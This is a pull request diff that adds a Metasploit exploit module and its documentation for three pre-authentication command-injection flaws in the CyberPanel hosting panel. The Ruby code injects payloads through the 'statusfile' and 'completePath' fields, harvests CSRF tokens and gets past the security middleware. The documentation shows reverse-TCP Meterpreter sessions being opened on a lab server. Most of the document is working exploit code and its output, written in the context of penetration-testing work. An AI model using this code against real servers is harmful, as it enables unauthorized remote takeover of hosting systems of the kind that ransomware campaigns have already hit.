### PR TITLE
Add CyberPanel Pre-Auth RCE Exploit Module for (CVE-2024-51378 / CVE-2024-51567 / CVE-2024-51568)

### DIFF
--- a/documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
+++ b/documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
@@ -1,0 +1,128 @@
+## Vulnerable Application
+
+CyberPanel is an open-source web hosting control panel based on OpenLiteSpeed.
+This module exploits two pre-authenticated remote command execution (RCE) vulnerabilities found in certain versions of CyberPanel.
+
+- **CVE-2024-51378**: The `getresetstatus` endpoint in `dns/views.py` and
+`ftp/views.py` in CyberPanel before commit `1c0c6cb` allows remote attackers to
+bypass authentication and execute arbitrary commands via `/dns/getresetstatus` or
+`/ftp/getresetstatus` by bypassing `secMiddleware`(which applies only to POST
+requests) and using shell metacharacters in the `statusfile` property.
+This vulnerability has been exploited in the wild as of October 2024 by PSAUX, affecting versions through 2.3.6 and the unpatched 2.3.7.
+
+- **CVE-2024-51567**: The `upgrademysqlstatus` endpoint in `databases/views.py` in
+CyberPanel before commit `5b08cd6` allows remote attackers to bypass authentication
+and execute arbitrary commands via `/dataBases/upgrademysqlstatus`, also by
+bypassing `secMiddleware` and using shell metacharacters in the `statusfile` property.
+This vulnerability has similarly been exploited in the wild in October 2024
+by PSAUX, impacting versions through 2.3.6 and the unpatched 2.3.7.
+
+These vulnerabilities allow attackers to execute commands on the server without needing authentication.
+
+### Installation Instructions
+
+To set up a vulnerable instance of CyberPanel for testing, follow these
+instructions on an Ubuntu 18.04 server (or later).
+The example below demonstrates installation on Ubuntu 18.04, though newer versions of Ubuntu should work as well.
+
+1. First, install necessary dependencies and disable IPv6 to avoid potential network issues:
+
+```bash
+sudo su -
+apt update && apt install -y curl wget
+sysctl -w net.ipv6.conf.all.disable_ipv6=1
+sysctl -w net.ipv6.conf.default.disable_ipv6=1
+```
+
+2. Then, download and run the CyberPanel installation script:
+
+```bash
+sh <(curl https://cyberpanel.net/install.sh || wget -O - https://cyberpanel.net/install.sh)
+```
+
+3. During installation, choose the following options:
+   - Install CyberPanel: Select option `1`
+   - Install CyberPanel with OpenLiteSpeed: Select option `1`
+   - Skip full installation (choose `n`)
+   - Skip Postfix, PowerDNS, and PureFTPd installations
+   - Skip Remote MySQL setup
+   - Install CyberPanel version `2.3.5` when prompted
+   - Decline Memcached and Redis installations
+
+## Verification Steps
+
+1. Install CyberPanel as outlined above.
+2. Start `msfconsole`.
+3. Use the module path: `use exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve`.
+4. Set the `RHOSTS` option to the target server’s IP.
+5. Run the exploit with the desired CVE (choose either `cve-2024-51567` or `cve-2024-51378`).
+6. A successful exploitation should provide a shell on the target.
+
+## Options
+
+No option
+
+## Scenarios
+
+### Example: CVE-2024-51567 on CyberPanel 2.3.5 (Ubuntu 18.04)
+
+To exploit `CVE-2024-51567` and achieve remote command execution:
+
+```bash
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > show actions 
+
+Exploit actions:
+
+       Name            Description
+       ----            -----------
+       CVE-2024-51378  Exploit using CVE-2024-51378
+   =>  CVE-2024-51567  Exploit using CVE-2024-51567
+
+
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090/
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] CSRF Token retrieved: ptcsu2Gumssya7hVSDpZXsPse0wu0kCoW4BsEMrXj0rmeX4CvsUwPDPbXNQIJXgJ
+[*] Sending stage (3045380 bytes) to 192.168.1.16
+[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 192.168.1.16:48380) at 2024-10-31 22:01:34 +0100
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.16
+OS           : Ubuntu 18.04 (Linux 5.4.0-84-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+
+```
+
+### Example: CVE-2024-51378 on CyberPanel 2.3.5 (Ubuntu 18.04)
+
+To exploit `CVE-2024-51378` and achieve remote command execution:
+
+```bash
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > set action CVE-2024-51378
+action => CVE-2024-51378
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > show actions
+
+Exploit actions:
+
+       Name            Description
+       ----            -----------
+   =>  CVE-2024-51378  Exploit using CVE-2024-51378
+       CVE-2024-51567  Exploit using CVE-2024-51567
+
+
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090/
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] CSRF Token retrieved: kbMIa2vWhrrlbTjMr1HVvX4IyecR3ENVkQwrJj7qZcXqAwYvo7a6d7MBQUxYnqaX
+[*] Sending stage (3045380 bytes) to 192.168.1.16
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.16:48384) at 2024-10-31 22:02:36 +0100
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.16
+OS           : Ubuntu 18.04 (Linux 5.4.0-84-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```

--- a/documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
+++ b/documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
@@ -75,31 +75,23 @@ No option
 To exploit `CVE-2024-51567` and achieve remote command execution:
 
 ```bash
-msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > show actions 
-
-Exploit actions:
-
-       Name            Description
-       ----            -----------
-       CVE-2024-51378  Exploit using CVE-2024-51378
-   =>  CVE-2024-51567  Exploit using CVE-2024-51567
-       CVE-2024-51568  Exploit using CVE-2024-51568
-
-
-msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090/
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > set action CVE-2024-51567
+action => CVE-2024-51567
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090
 
 [*] Started reverse TCP handler on 192.168.1.36:4444 
-[*] CSRF Token retrieved: ptcsu2Gumssya7hVSDpZXsPse0wu0kCoW4BsEMrXj0rmeX4CvsUwPDPbXNQIJXgJ
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Target is running CyberPanel and is vulnerable.
 [*] Sending stage (3045380 bytes) to 192.168.1.16
-[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 192.168.1.16:48380) at 2024-10-31 22:01:34 +0100
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 192.168.1.16:35194) at 2024-11-21 22:26:12 +0100
 
 meterpreter > sysinfo 
 Computer     : 192.168.1.16
-OS           : Ubuntu 18.04 (Linux 5.4.0-84-generic)
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
-
+meterpreter > 
 ```
 
 ### Example: CVE-2024-51378 on CyberPanel 2.3.5 (Ubuntu 18.04)
@@ -109,52 +101,13 @@ To exploit `CVE-2024-51378` and achieve remote command execution:
 ```bash
 msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > set action CVE-2024-51378
 action => CVE-2024-51378
-msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > show actions
-
-Exploit actions:
-
-       Name            Description
-       ----            -----------
-   =>  CVE-2024-51378  Exploit using CVE-2024-51378
-       CVE-2024-51567  Exploit using CVE-2024-51567
-       CVE-2024-51568  Exploit using CVE-2024-51568
-
-
-msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090/
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090
 
 [*] Started reverse TCP handler on 192.168.1.36:4444 
-[*] CSRF Token retrieved: kbMIa2vWhrrlbTjMr1HVvX4IyecR3ENVkQwrJj7qZcXqAwYvo7a6d7MBQUxYnqaX
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Target is running CyberPanel and is vulnerable.
 [*] Sending stage (3045380 bytes) to 192.168.1.16
-[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.16:48384) at 2024-10-31 22:02:36 +0100
-
-meterpreter > sysinfo 
-Computer     : 192.168.1.16
-OS           : Ubuntu 18.04 (Linux 5.4.0-84-generic)
-Architecture : x64
-BuildTuple   : x86_64-linux-musl
-Meterpreter  : x64/linux
-```
-
-### Example: CVE-2024-51568 on CyberPanel 2.3.4 (Ubuntu 18.04)
-
-```bash
-msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > show actions 
-
-Exploit actions:
-
-       Name            Description
-       ----            -----------
-       CVE-2024-51378  Exploit using CVE-2024-51378
-       CVE-2024-51567  Exploit using CVE-2024-51567
-   =>  CVE-2024-51568  Exploit using CVE-2024-51568
-
-
-msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090/
-
-[*] Started reverse TCP handler on 192.168.1.36:4444 
-[*] CSRF Token retrieved: VRu68HihQzQ0UcDjDhwwGyQV4PjXLkcDzCGf0fuRGPR6f3DO4oEcZmIiuGCXkubX
-[*] Sending stage (3045380 bytes) to 192.168.1.16
-[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.16:38878) at 2024-11-01 08:42:53 +0100
+[*] Meterpreter session 5 opened (192.168.1.36:4444 -> 192.168.1.16:39820) at 2024-11-21 22:27:06 +0100
 
 meterpreter > sysinfo 
 Computer     : 192.168.1.16
@@ -162,4 +115,30 @@ OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### Example: CVE-2024-51568 on CyberPanel 2.3.4 (Ubuntu 18.04)
+
+```bash
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > set action CVE-2024-51568
+action => CVE-2024-51568
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] CSRF Token retrieved: CtCqolh8EQHkik3J8sjbUxPemD9PN8j2cZ7QBIxtUN3zmHQ1sbSnXOCBVWr00kI7
+[*] CSRF Token retrieved: ExmQR7HciOpdsPRrh43NNjGNYaLbRb6pKnap4Z5onPfVGjPqCNFyehTAqIpBrSuB
+[+] The target is vulnerable. Target is running CyberPanel and is vulnerable.
+[*] CSRF Token retrieved: NMATUvqAxFW2bU5bnhvFf860BfFrj8DGMqtSXS81RbmxjifXo9sJCe1KM7933cIY
+[*] Sending stage (3045380 bytes) to 192.168.1.16
+[*] Meterpreter session 7 opened (192.168.1.36:4444 -> 192.168.1.16:46212) at 2024-11-21 22:37:00 +0100
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.16
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
 ```

--- a/documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
+++ b/documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
@@ -135,7 +135,7 @@ BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
 ```
 
-### Example: CVE-2024-51567 on CyberPanel 2.3.4 (Ubuntu 18.04)
+### Example: CVE-2024-51568 on CyberPanel 2.3.4 (Ubuntu 18.04)
 
 ```bash
 msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > show actions 

--- a/documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
+++ b/documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
@@ -54,6 +54,7 @@ sh <(curl https://cyberpanel.net/install.sh || wget -O - https://cyberpanel.net/
    - Skip Remote MySQL setup
    - Install CyberPanel version `2.3.4` when prompted
    - Decline Memcached and Redis installations
+   - Decline WatchDog setup for Web service and Database service
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
+++ b/documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
@@ -17,7 +17,7 @@ bypassing `secMiddleware` and using shell metacharacters in the `statusfile` pro
 This vulnerability has similarly been exploited in the wild in October 2024
 by PSAUX, impacting versions through 2.3.6 and the unpatched 2.3.7.
 
-- **CVE-2024-51568**: CyberPanel (aka Cyber Panel) before 2.3.5 allows command
+- **CVE-2024-51568**: CyberPanel before 2.3.5 allows command
 injection via completePath in the ProcessUtilities.outputExecutioner() sink.
 This vulnerability includes unauthenticated remote code execution via shell
 metacharacters in the /filemanager/upload (aka File Manager upload) endpoint,

--- a/documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
+++ b/documentation/modules/exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve.md
@@ -17,6 +17,12 @@ bypassing `secMiddleware` and using shell metacharacters in the `statusfile` pro
 This vulnerability has similarly been exploited in the wild in October 2024
 by PSAUX, impacting versions through 2.3.6 and the unpatched 2.3.7.
 
+- **CVE-2024-51568**: CyberPanel (aka Cyber Panel) before 2.3.5 allows command
+injection via completePath in the ProcessUtilities.outputExecutioner() sink.
+This vulnerability includes unauthenticated remote code execution via shell
+metacharacters in the /filemanager/upload (aka File Manager upload) endpoint,
+exploiting shell metacharacters for arbitrary command execution.
+
 These vulnerabilities allow attackers to execute commands on the server without needing authentication.
 
 ### Installation Instructions
@@ -46,7 +52,7 @@ sh <(curl https://cyberpanel.net/install.sh || wget -O - https://cyberpanel.net/
    - Skip full installation (choose `n`)
    - Skip Postfix, PowerDNS, and PureFTPd installations
    - Skip Remote MySQL setup
-   - Install CyberPanel version `2.3.5` when prompted
+   - Install CyberPanel version `2.3.4` when prompted
    - Decline Memcached and Redis installations
 
 ## Verification Steps
@@ -55,7 +61,7 @@ sh <(curl https://cyberpanel.net/install.sh || wget -O - https://cyberpanel.net/
 2. Start `msfconsole`.
 3. Use the module path: `use exploit/unix/webapp/cyberpanel_preauth_rce_multi_cve`.
 4. Set the `RHOSTS` option to the target server’s IP.
-5. Run the exploit with the desired CVE (choose either `cve-2024-51567` or `cve-2024-51378`).
+5. Run the exploit with the desired CVE (choose either `cve-2024-51567`, `cve-2024-51568` or `cve-2024-51378`).
 6. A successful exploitation should provide a shell on the target.
 
 ## Options
@@ -77,6 +83,7 @@ Exploit actions:
        ----            -----------
        CVE-2024-51378  Exploit using CVE-2024-51378
    =>  CVE-2024-51567  Exploit using CVE-2024-51567
+       CVE-2024-51568  Exploit using CVE-2024-51568
 
 
 msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090/
@@ -110,6 +117,7 @@ Exploit actions:
        ----            -----------
    =>  CVE-2024-51378  Exploit using CVE-2024-51378
        CVE-2024-51567  Exploit using CVE-2024-51567
+       CVE-2024-51568  Exploit using CVE-2024-51568
 
 
 msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090/
@@ -122,6 +130,35 @@ msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.
 meterpreter > sysinfo 
 Computer     : 192.168.1.16
 OS           : Ubuntu 18.04 (Linux 5.4.0-84-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Example: CVE-2024-51567 on CyberPanel 2.3.4 (Ubuntu 18.04)
+
+```bash
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > show actions 
+
+Exploit actions:
+
+       Name            Description
+       ----            -----------
+       CVE-2024-51378  Exploit using CVE-2024-51378
+       CVE-2024-51567  Exploit using CVE-2024-51567
+   =>  CVE-2024-51568  Exploit using CVE-2024-51568
+
+
+msf6 exploit(unix/webapp/cyberpanel_preauth_rce_multi_cve) > run http://192.168.1.16:8090/
+
+[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] CSRF Token retrieved: VRu68HihQzQ0UcDjDhwwGyQV4PjXLkcDzCGf0fuRGPR6f3DO4oEcZmIiuGCXkubX
+[*] Sending stage (3045380 bytes) to 192.168.1.16
+[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 192.168.1.16:38878) at 2024-11-01 08:42:53 +0100
+
+meterpreter > sysinfo 
+Computer     : 192.168.1.16
+OS           : Ubuntu 18.04 (Linux 5.4.0-150-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     random_domain = Rex::Text.rand_text_alphanumeric(8)
 
-    random_complete_path = "/dev/null;#{payload.encoded}#"
+    random_complete_path = "/dev/null;#{payload.encoded} #"
 
     random_filename = "#{Rex::Text.rand_text_alphanumeric(6)}.txt"
     random_content = Rex::Text.rand_text_alphanumeric(4)

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
       payload_data = post_data.to_s
 
       headers['X-CSRFToken'] = csrf_token
-      headers['Referer'] = normalize_uri(target_uri.path, 'filemanager/upload')
+      headers['Referer'] = "#{(datastore['SSL'] ? 'https' : 'http')}://#{datastore['RHOST']}:#{datastore['RPORT']}#{normalize_uri(target_uri.path, 'filemanager/upload')}"
       headers['Cookie'] = "csrftoken=#{csrf_token}"
       ctype = "multipart/form-data; boundary=#{post_data.bound}"
 

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
   include Msf::Module::HasActions
   include Msf::Exploit::Remote::HttpClient

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -148,6 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
       payload_data = post_data.to_s
 
       headers['X-CSRFToken'] = csrf_token
+      headers['Referer'] = normalize_uri(target_uri.path, 'filemanager/upload')
       headers['Cookie'] = "csrftoken=#{csrf_token}"
       ctype = "multipart/form-data; boundary=#{post_data.bound}"
 

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -195,9 +195,8 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     csrf_token = res.get_cookies.match(/csrftoken=(\w+)/)&.captures&.first
-    vprint_status("CSRF Token retrieved: #{csrf_token}") if csrf_token
     fail_with(Failure::NotFound, 'Unable to retrieve CSRF token.') unless csrf_token
-    print_status("CSRF Token retrieved: #{csrf_token}")
+    vprint_status("CSRF Token retrieved: #{csrf_token}")
     csrf_token
   end
 end

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
           These vulnerabilities were exploited in ransomware campaigns affecting over 22,000 CyberPanel instances, with the PSAUX ransomware being the primary actor in these attacks.
         },
         'Author' => [
-          'DreyAnd',               # Vulnerability discovery (CVE-2024-51567)
+          'DreyAnd',               # Vulnerability discovery (CVE-2024-51567-8)
           'Valentin Lobstein',     # Metasploit Module
           'Luka Petrovic (refr4g)' # Vulnerability discovery (CVE-2024-51378)
         ],

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Cookie' => "csrftoken=#{csrf_token}"
       },
       'data' => post_data.to_s
-    })
+    }, 0)
   end
 
   def get_csrf_token

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_status_update(endpoint)
-    payload_data = '{"statusfile": "/dev/null; %s #"}' % payload.encoded
+    payload_data = '{"statusfile": "/dev/null;%s #"}' % payload.encoded
 
     send_request_cgi({
       'method' => 'OPTIONS',

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -135,8 +135,8 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     csrf_token = res.get_cookies.match(/csrftoken=(\w+)/)&.captures&.first
-    print_status("CSRF Token retrieved: #{csrf_token}") if csrf_token
     fail_with(Failure::NotFound, 'Unable to retrieve CSRF token.') unless csrf_token
+    print_status("CSRF Token retrieved: #{csrf_token}")
     csrf_token
   end
 end

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'CyberPanel Multi CVE Pre-auth RCE',
         'Description' => %q{
-          This module exploits three separate pre-authenticated Remote Code Execution vulnerabilities in CyberPanel:
+          This module exploits three separate unauthenticated Remote Code Execution vulnerabilities in CyberPanel:
 
           - CVE-2024-51567: Command injection vulnerability in the "upgrademysqlstatus" endpoint.
           - CVE-2024-51568: Command Injection via the "completePath" parameter in the "outputExecutioner" sink.

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -198,7 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path)
     })
 
-    csrf_token = res.get_cookies.match(/csrftoken=(\w+)/)&.captures&.first
+    csrf_token = res&.get_cookies.match(/csrftoken=(\w+)/)&.captures&.first
     fail_with(Failure::NotFound, 'Unable to retrieve CSRF token.') unless csrf_token
     vprint_status("CSRF Token retrieved: #{csrf_token}")
     csrf_token

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -52,8 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'SSL' => true
         },
         'DefaultTarget' => 0,
@@ -198,7 +197,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path)
     })
 
-    csrf_token = res&.get_cookies.match(/csrftoken=(\w+)/)&.captures&.first
+    csrf_token = res&.get_cookies&.match(/csrftoken=(\w+)/)&.captures&.first
     fail_with(Failure::NotFound, 'Unable to retrieve CSRF token.') unless csrf_token
     vprint_status("CSRF Token retrieved: #{csrf_token}")
     csrf_token

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -52,6 +52,10 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ]
         ],
+      'DefaultOptions' =>
+        {
+          'SSL' => true
+        },
         'DefaultTarget' => 0,
         'Privileged' => false,
         'DisclosureDate' => '2024-10-27',

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -15,9 +15,10 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'CyberPanel Multi CVE Pre-auth RCE',
         'Description' => %q{
-          This module exploits two separate pre-authenticated Remote Code Execution vulnerabilities in CyberPanel:
+          This module exploits three separate pre-authenticated Remote Code Execution vulnerabilities in CyberPanel:
 
           - CVE-2024-51567: Command injection vulnerability in the "upgrademysqlstatus" endpoint.
+          - CVE-2024-51568: Command Injection via the "completePath" parameter in the "outputExecutioner" sink.
           - CVE-2024-51378: Unauthenticated RCE in "/ftp/getresetstatus" and "/dns/getresetstatus".
 
           These vulnerabilities were exploited in ransomware campaigns affecting over 22,000 CyberPanel instances, with the PSAUX ransomware being the primary actor in these attacks.
@@ -30,6 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'References' => [
           ['CVE', '2024-51567'],
+          ['CVE', '2024-51568'],
           ['CVE', '2024-51378'],
           ['URL', 'https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce'],
           ['URL', 'https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/'],
@@ -54,6 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2024-10-27',
         'Actions' => [
           ['CVE-2024-51567', { 'Description' => 'Exploit using CVE-2024-51567' }],
+          ['CVE-2024-51568', { 'Description' => 'Exploit using CVE-2024-51568' }],
           ['CVE-2024-51378', { 'Description' => 'Exploit using CVE-2024-51378' }]
         ],
         'DefaultAction' => 'CVE-2024-51567',
@@ -74,6 +77,8 @@ class MetasploitModule < Msf::Exploit::Remote
     case action.name.downcase
     when 'cve-2024-51567'
       execute_status_update('dataBases/upgrademysqlstatus')
+    when 'cve-2024-51568'
+      execute_filemanager_upload
     when 'cve-2024-51378'
       execute_status_update("#{['ftp', 'dns'].sample}/getresetstatus")
     else
@@ -93,6 +98,34 @@ class MetasploitModule < Msf::Exploit::Remote
         'X-CSRFToken' => get_csrf_token
       }
     }, 0)
+  end
+
+  def execute_filemanager_upload
+    csrf_token = get_csrf_token
+
+    post_data = Rex::MIME::Message.new
+
+    random_domain = Rex::Text.rand_text_alphanumeric(8)
+
+    random_complete_path = "/dev/null;#{payload.encoded}#"
+
+    random_filename = "#{Rex::Text.rand_text_alphanumeric(6)}.txt"
+    random_content = Rex::Text.rand_text_alphanumeric(4)
+
+    post_data.add_part(random_domain, nil, nil, 'form-data; name="domainName"')
+    post_data.add_part(random_complete_path, nil, nil, 'form-data; name="completePath"')
+    post_data.add_part(random_content, 'text/plain', nil, "form-data; name=\"file\"; filename=\"#{random_filename}\"")
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'filemanager', 'upload'),
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'headers' => {
+        'X-CSRFToken' => csrf_token,
+        'Cookie' => "csrftoken=#{csrf_token}"
+      },
+      'data' => post_data.to_s
+    })
   end
 
   def get_csrf_token

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'CyberPanel Multi CVE Pre-auth RCE',
         'Description' => %q{
-          This module exploits three separate pre-authenticated Remote Code Execution vulnerabilities in CyberPanel:
+          This module exploits two separate pre-authenticated Remote Code Execution vulnerabilities in CyberPanel:
 
           - CVE-2024-51567: Command injection vulnerability in the "upgrademysqlstatus" endpoint.
           - CVE-2024-51378: Unauthenticated RCE in "/ftp/getresetstatus" and "/dns/getresetstatus".

--- a/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
+++ b/modules/exploits/unix/webapp/cyberpanel_preauth_rce_multi_cve.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Module::HasActions
   include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -73,59 +74,118 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
-  def exploit
-    case action.name.downcase
-    when 'cve-2024-51567'
-      execute_status_update('dataBases/upgrademysqlstatus')
-    when 'cve-2024-51568'
-      execute_filemanager_upload
-    when 'cve-2024-51378'
-      execute_status_update("#{['ftp', 'dns'].sample}/getresetstatus")
-    else
-      fail_with(Failure::BadConfig, 'Invalid ACTION selected')
+  def detect_cyberpanel
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    return false unless res
+
+    html = res.get_html_document
+
+    paths = [
+      html.at('link[href="/static/baseTemplate/assets/finalLoginPageCSS/allCss.css"]')&.[]('href'),
+      html.at('img[src="/static/baseTemplate/cyber-panel-logo.svg"]')&.[]('src')
+    ]
+
+    return false unless paths.all?
+
+    paths.all? do |path|
+      response = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, path)
+      })
+      response&.code == 200
     end
   end
 
-  def execute_status_update(endpoint)
-    payload_data = '{"statusfile": "/dev/null;%s #"}' % payload.encoded
+  def check
+    return CheckCode::Safe('Target does not appear to be CyberPanel.') unless detect_cyberpanel
 
-    send_request_cgi({
-      'method' => 'OPTIONS',
-      'uri' => normalize_uri(target_uri.path, endpoint),
-      'data' => payload_data,
-      'headers' => {
